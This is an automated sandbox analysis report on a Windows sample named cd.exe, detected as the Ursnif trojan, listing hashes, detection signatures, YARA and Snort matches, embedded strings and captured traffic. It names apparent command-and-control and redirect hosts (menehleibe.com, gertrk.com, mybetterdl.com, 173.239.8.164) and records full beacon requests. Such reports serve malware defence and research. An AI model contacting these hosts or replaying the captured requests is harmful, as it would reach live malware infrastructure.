Play interactive tour

Edit tour

Windows Analysis Report cd.exe

Overview

General Information

Sample Name:	cd.exe
Analysis ID:	483177
MD5:	cd02e745a08dd29cb6fda1761b2f4b6e
SHA1:	1a0dd3348bb0f856fff51f7e22364b0974fa1ad3
SHA256:	a4ff2e7dd35e8f7362739c3a578563458548ed5ffb30abe5ec6bf6f2c0de8eb7
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Yara detected Ursnif

Detected unpacking (changes PE section rights)

Writes or reads registry keys via WMI

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Found PSEXEC tool (often used for remote process execution)

Writes registry values via WMI

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Yara detected PsExec sysinternal tool

IP address seen in connection with other malware

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

PE file contains more sections than normal

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

cd.exe (PID: 6888 cmdline: 'C:\Users\user\Desktop\cd.exe' MD5: CD02E745A08DD29CB6FDA1761B2F4B6E)

iexplore.exe (PID: 4568 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 160 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4568 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
cd.exe	JoeSecurity_PsExec	Yara detected PsExec sysinternal tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.408326958.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.408240054.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.407536237.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.429559902.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.408480874.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.408113887.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.407620205.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.408655668.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.408034062.0000000003138000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: cd.exe PID: 6888	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: cd.exe

ReversingLabs: Detection: 60%

Machine Learning detection for sample

Show sources

Source: cd.exe

Joe Sandbox ML: detected

Source: 1.2.cd.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.3.cd.exe.82998c.0.unpack	Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\cd.exe

Unpacked PE file: 1.2.cd.exe.400000.0.unpack

Source: cd.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: unknown	HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.192.101.24:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 168.119.139.96:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.102.106:443 -> 192.168.2.6:49751 version: TLS 1.2

Source:	Binary string: D:\a\1\s\Win32\Release\logonsessions.pdb source: cd.exe
Source:	Binary string: c:\stream\develop\Regionhunt.pdb source: cd.exe
Source:	Binary string: D:\a\1\s\Win32\Release\RamMap.pdb source: cd.exe
Source:	Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb))) source: cd.exe
Source:	Binary string: D:\B\T\BuildResults\bin\Release\AcrobatInfo.pdb source: cd.exe
Source:	Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb666 source: cd.exe
Source:	Binary string: C:\agent\_work\93\s\Win32\Release\autoruns.pdb source: cd.exe
Source:	Binary string: D:\a\1\s\Win32\Release\adrestore.pdb source: cd.exe
Source:	Binary string: D:\B\T\BuildResults\bin\Release\TextExtractor.pdb source: cd.exe

Spreading:

Found PSEXEC tool (often used for remote process execution)

Show sources

Source: cd.exe

String found in binary or memory: PsExec executes a program on a remote system, where remotely executed console

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49737 -> 173.239.8.164:80
Source: Traffic	Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49737 -> 173.239.8.164:80
Source: Traffic	Snort IDS: 2030821 ET MALWARE Win32/Zonebac Traffic Redirect 192.168.2.6:49737 -> 173.239.8.164:80

Source: Joe Sandbox View

ASN Name: WEBAIR-INTERNETUS WEBAIR-INTERNETUS

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: Yara match

File source: cd.exe, type: SAMPLE

Source: Joe Sandbox View	IP Address: 173.192.101.24 173.192.101.24
Source: Joe Sandbox View	IP Address: 173.192.101.24 173.192.101.24

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: msapplication.xml0.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: re currently viewing and your location (ad serving is based on general location). Personalised content and ads can be based on those things and your activity, like Google searches and videos that you watch on YouTube. Personalised content and ads include things like more relevant results and recommendations, a customised YouTube homepage, and ads that are tailored to your interests.</div><div class="yS1nld">Click 'Customise' to review options, including controls to reject the use of cookies for personalisation and information about browser-level controls to reject some or all cookies for other uses. You can also visit <span>g.co/privacytools</span> at any time.</div></div></div></div><div class="VDity"><button class="tHlp8d" id="VnjCcb" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQiJAHCBo"><div class="jyfHyd" role="none">Customise</div></button><button class="tHlp8d" id="L2AGLb" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQiZAHCBs"><div class="jyfHyd" role="none">I agree</div></button></div><div class="XWlrff"><style>.XWlrff{margin:20px;display:flex;flex-direction:row;justify-content:center;position:absolute;bottom:0;right:0;left:0}.peRL2e,.o9D5Zb{color:#70757a;text-decoration:none}.o9D5Zb{margin:0 10px}.XWlrff{margin:18px auto 20px;position:relative}@media (max-width:320px){.peRL2e{font-size:11px}}@media (max-height:480px){.XWlrff{margin-bottom:10px}}</style><a class="peRL2e" href="https://policies.google.com/privacy?hl=en-GB&fg=1&utm_source=ucbs" id="RP3V5c" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQj5AHCBw">Privacy</a><div class="o9D5Zb" aria-hidden="true">·</div><a class="peRL2e" href="https://policies.google.com/terms?hl=en-GB&fg=1&utm_source=ucbs" id="HQ1lb" data-ved="0ahUKEwiNsaLc0P7yAhWN3KQKHRlXBzsQkJAHCB0">Terms</a></div></div></div></span></div></div><script nonce="sBDQvviEJYE6GoG6F/T2Gw==">(function(){var consentCookiePayload='YES+shp.gws-20210909-0-RC2.en+FX+509';var nidCookiePayload='223\x3dao_PNWYHKNRTKr72m4usLcTnJh9tuvM0SumQjLr2NpAzZjJRtiknK0gCmTBXLOnKGQSjcjc7q7fXQyHh5YsCZxvbJHtqG4tUjigGnPyvRGQzyKRILvDlG4HWUN7F5Jpi_nHXn1ESCCOSvi8kY-pjocaxP4tq4OrC3-8IjbCQNp0';var cookieDomain='.google.com';var cookieUpdateConsentUrl='https://consent.google.com/s?continue\x3dhttps://www.google.com/?gws_rd%3Dssl\x26gl\x3dGB\x26m\x3d0\x26pc\x3dshp\x26uxe\x3dnone\x26v\x3dshp.gws-20210909-0-RC2.en%2BFX%2B509\x26ca\x3de\x26x\x3d5\x26t\x3dADw3F8gQkSzvPQQLJeh4nXGqegxVPXiLSQ:1631628204516';var sIU='https://accounts.google.com/ServiceLogin?hl\x3den\x26continue\x3dhttps://www.google.com/?gws_rd%3Dssl\x26gae\x3dcb-none';var cU='https://consent.google.com/d?continue\x3dhttps://www.google.com/?gws_rd%3Dssl\x26gl\x3dGB\x26m\x3d0\x26pc\x3dshp\x26uxe\x3dnone\x26hl\x3den\x26src\x3d2';var pC='SEARCH_HOMEPAGE';var gL='GB';var isMobile=false;var srp=false; equals www.youtube.com (Youtube)

Source: LM1X3BMT.htm.9.dr	String found in binary or memory: http://agoogleaday.com/%23date%3D2011-06-04
Source: cd.exe	String found in binary or memory: http://citationstyles.org/
Source: cd.exe	String found in binary or memory: http://creativecommons.org/licenses/by-sa/3.0/
Source: ~DFFAD0E470126C2D77.TMP.7.dr, index[1].htm.9.dr	String found in binary or memory: http://google.com
Source: 1G7O03DV.htm.9.dr, ~DFFAD0E470126C2D77.TMP.7.dr	String found in binary or memory: http://menehleibe.com/
Source: {F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.dr	String found in binary or memory: http://menehleibe.com/Root
Source: cd.exe	String found in binary or memory: http://p.yusukekamiyamane.com/
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: http://schema.org/WebPage
Source: cd.exe	String found in binary or memory: http://support.mendeley.com/customer/portal/articles/227955
Source: 1G7O03DV.htm.9.dr	String found in binary or memory: http://ww9.menehleibe.com/
Source: msapplication.xml.7.dr	String found in binary or memory: http://www.amazon.com/
Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	String found in binary or memory: http://www.broofa.com
Source: msapplication.xml1.7.dr, 0V71R0V5.htm.9.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.7.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.7.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.7.dr	String found in binary or memory: http://www.reddit.com/
Source: cd.exe	String found in binary or memory: http://www.sysinternals.com
Source: cd.exe	String found in binary or memory: http://www.sysinternals.comFileVersionLegalCopyright
Source: cd.exe	String found in binary or memory: http://www.sysinternals.comWindowPositionSOFTWARE
Source: cd.exe	String found in binary or memory: http://www.sysinternals.comopenConnection
Source: cd.exe	String found in binary or memory: http://www.sysinternals.comopenFolder
Source: msapplication.xml5.7.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.7.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.7.dr	String found in binary or memory: http://www.youtube.com/
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://accounts.google.com/ServiceLogin?hl
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://adservice.google.com/adsid/google/ui
Source: LM1X3BMT.htm.9.dr, rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	String found in binary or memory: https://apis.google.com
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://artsandculture.google.com/partner/museo-reina-sofia
Source: cd.exe	String found in binary or memory: https://citationstyles.org
Source: cd.exe	String found in binary or memory: https://clients2.google.com/service/update2/crxupdate_urlBrowser
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://consent.google.com/d?continue
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://consent.google.com/s?continue
Source: cd.exe	String found in binary or memory: https://crashpad.chromium.org/
Source: cd.exe	String found in binary or memory: https://crashpad.chromium.org/bug/new
Source: cd.exe	String found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: cd.exe	String found in binary or memory: https://csl.mendeley.com
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://donate.google.com/checkout?campaignid%3D6420545008435200
Source: imagestore.dat.9.dr	String found in binary or memory: https://gertrk.com/favicon.ico
Source: ~DFFAD0E470126C2D77.TMP.7.dr	String found in binary or memory: https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com
Source: {F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.dr	String found in binary or memory: https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.comRoot
Source: cd.exe	String found in binary or memory: https://github.com/Juris-M/citeproc-js
Source: cd.exe	String found in binary or memory: https://github.com/citation-style-language/styles
Source: cd.exe	String found in binary or memory: https://ims-na1-stg1.adobelogin.com
Source: cd.exe	String found in binary or memory: https://ims-prod06.adobelogin.com
Source: cd.exe	String found in binary or memory: https://lcs-cops-dev.adobe.io
Source: cd.exe	String found in binary or memory: https://lcs-cops-dev.adobe.iohttps://lcs-cops-stage.adobe.iohttps://lcs-cops.adobe.iohttps://lcs-rob
Source: cd.exe	String found in binary or memory: https://lcs-cops-stage.adobe.io
Source: cd.exe	String found in binary or memory: https://lcs-cops.adobe.io
Source: cd.exe	String found in binary or memory: https://lcs-robs-dev.adobe.io
Source: cd.exe	String found in binary or memory: https://lcs-robs-stage.adobe.io
Source: cd.exe	String found in binary or memory: https://lcs-robs.adobe.io
Source: cd.exe	String found in binary or memory: https://lcs-ulecs-dev.adobe.io
Source: cd.exe	String found in binary or memory: https://lcs-ulecs-stage.adobe.io
Source: cd.exe	String found in binary or memory: https://lcs-ulecs.adobe.io
Source: cd.exe	String found in binary or memory: https://mendeley.com/reference-management/web-importer/#id_1?dgcid=Mendeley_Desktop_Onboarding-Add-I
Source: d4a6d4bd[1].htm.9.dr	String found in binary or memory: https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://ogs.google.com/widget/app/so?bc=1
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19025503
Source: cd.exe	String found in binary or memory: https://plasma.kde.org
Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://policies.google.com/privacy?hl=en-GB&fg=1&utm_source=ucbs
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://policies.google.com/terms?hl=en-GB&fg=1&utm_source=ucbs
Source: cd.exe	String found in binary or memory: https://rrchnm.org/
Source: cd.exe	String found in binary or memory: https://service.elsevier.com/app/answers/detail/a_id/19601/kw/connectivity/supporthub/mendeley/1setU
Source: cd.exe	String found in binary or memory: https://service.elsevier.com/app/answers/detail/a_id/19611/kw/duplicates/supporthub/mendeley/Yes
Source: cd.exe	String found in binary or memory: https://service.elsevier.com/app/answers/detail/a_id/22094/kw/migrate/supporthub/mendeley/
Source: cd.exe	String found in binary or memory: https://service.elsevier.com/app/contact/supporthub/mendeley?dgcid=Mendeley_Desktop_Help-menu-Contac
Source: cd.exe	String found in binary or memory: https://service.elsevier.com/app/home/supporthub/mendeley/?dgcid=Mendeley_Desktop_Help-menu-FAQ
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://trends.google.com/hottrends
Source: cd.exe	String found in binary or memory: https://www.elsevier.com/legal/elsevier-website-terms-and-conditions
Source: cd.exe	String found in binary or memory: https://www.elsevier.com/legal/privacy-policy
Source: cd.exe	String found in binary or memory: https://www.gmu.edu/
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.google.co.uk/intl/en/about/products
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.google.com
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.google.com/?gws_rd%3Dssl
Source: ~DFFAD0E470126C2D77.TMP.7.dr	String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: ~DFFAD0E470126C2D77.TMP.7.dr	String found in binary or memory: https://www.google.com/?gws_rd=ssl_bnm_redirect=http://google.com
Source: {F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.dr	String found in binary or memory: https://www.google.com/?gws_rd=ssl_bnm_redirect=http://google.com/?gws_rd=ssl
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.google.com/_/og/promos/
Source: {F14FAF31-15AF-11EC-90E5-ECF4BB2D2496}.dat.7.dr	String found in binary or memory: https://www.google.com/index.php?url_bnm_redirect=http://google.com/?gws_rd=ssl_bnm_redirect=http://
Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.google.com/search?gws_rd%3Dssl%26q%3Dnebulae%26um%3D1%26ie%3DUTF-8%26tbm%3Disch%26csf%3D
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.google.com/url?q=https://www.google.com/chrome/download-chrome-for-search/%3Fbrand%3DOKW
Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js.9.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.auSrFW-FX90.O/rt=j/m=qabr
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.auSrFW-FX90.O/rt=j/m=qdsh/d=1/ed=1/rs=AA2YrTtiIgpyWC3
Source: LM1X3BMT.htm.9.dr	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.wtXa61WU3WQ.L.X.O/m=qcwid/excm=qaaw
Source: cd.exe	String found in binary or memory: https://www.mendeley.com/guides/desktop/04-read-highlight-annotate?dgcid=Mendeley_Desktop_Onboarding
Source: cd.exe	String found in binary or memory: https://www.mendeley.com/guides/using-citation-editor?dgcid=Mendeley_Desktop_Onboarding-Help-Cite
Source: cd.exe	String found in binary or memory: https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guides
Source: cd.exe	String found in binary or memory: https://www.mendeley.com/guides?dgcid=Mendeley_Desktop_Help-menu-Help-guideshttps://www.mendeley.com
Source: cd.exe	String found in binary or memory: https://www.mendeley.com/library
Source: cd.exe	String found in binary or memory: https://www.mendeley.com?dgcid=Mendeley_Desktop_Help-menu-website
Source: cd.exe	String found in binary or memory: https://www.sysinternals.comntdllRtlInitUnicodeStringNtOpenDirectoryObjectNtQuerySectionNtQueryDirec
Source: cd.exe	String found in binary or memory: https://www.virustotal.com/about/terms-of-service%s
Source: cd.exe	String found in binary or memory: https://www.virustotal.comPOST4e3202fdbe953d628f650229af5b3eb49cd46b2d3bfe5546ae3c5fa48b554e0capikey
Source: cd.exe	String found in binary or memory: https://www.zotero.org/

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateHost: menehleibe.comContent-Length: 12Connection: Keep-AliveCache-Control: no-cacheData Raw: 69 63 3d 30 26 66 62 3d 74 72 75 65 Data Ascii: ic=0&fb=true

Source: unknown

DNS traffic detected: queries for: menehleibe.com

Source: global traffic	HTTP traffic detected: GET /aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrmTazGZKmMBhE5rzai4ARXglTM7lPAlIssdjgnlOgBObVnL6dMrNPV4wycVX3s5OxtJMXedCWE2r5biNOcX3y5Pmw-0BUdBZv7MvlSTP2Fk9AaabOem2Q73GpjsG_dwXVnUc2FH6zZuqWu2Dli66C-XucADfX2tBPlR3prQOfp40mttv00_iCR6q6fLI9QZgGY11WgfO3qdEgV2xwoj0eGTIxBicwTEMicE9X3AYQsCpAEn3pdnGSoQpHTA7Kz9fo94mKnTULy2teQgTesP9hhxLreOeHrbCzwHSSbH-FJZx15JZAYCxI8gV6bvS4IWlDg_vysGgTqrjiFCjhA5kocz54NYxtQVvyXSZspRWMKjI1QYN8ennj2JVFvWfYyzeLbGr1ovqBCtNBvJi2ztcTgBlsW0SM8XIsRgd4QMcWZcycyUPzb9Wd1bDxFTAWmSXH43ynD5UObBi5FyNDw8qKKmoCnfedHiztWYQxKotKUGaKd1m_k2iMIc5SBU1Vi7-MGW4_Mi4WYIzJL61eBLaioPhng2BQ6PDt8aAWdDMho29RkRFHVPIQb3W3nWMGo8srLOHYnfrFRuEDgcm6cqkr2IQD0T7sB-GexA77NdWEi2cdlkkLEB146pQ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: mybetterdl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Referer: http://menehleibe.com/Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateConnection: Keep-AliveHost: p226681.mybetterdl.comCookie: rhid=79630578833
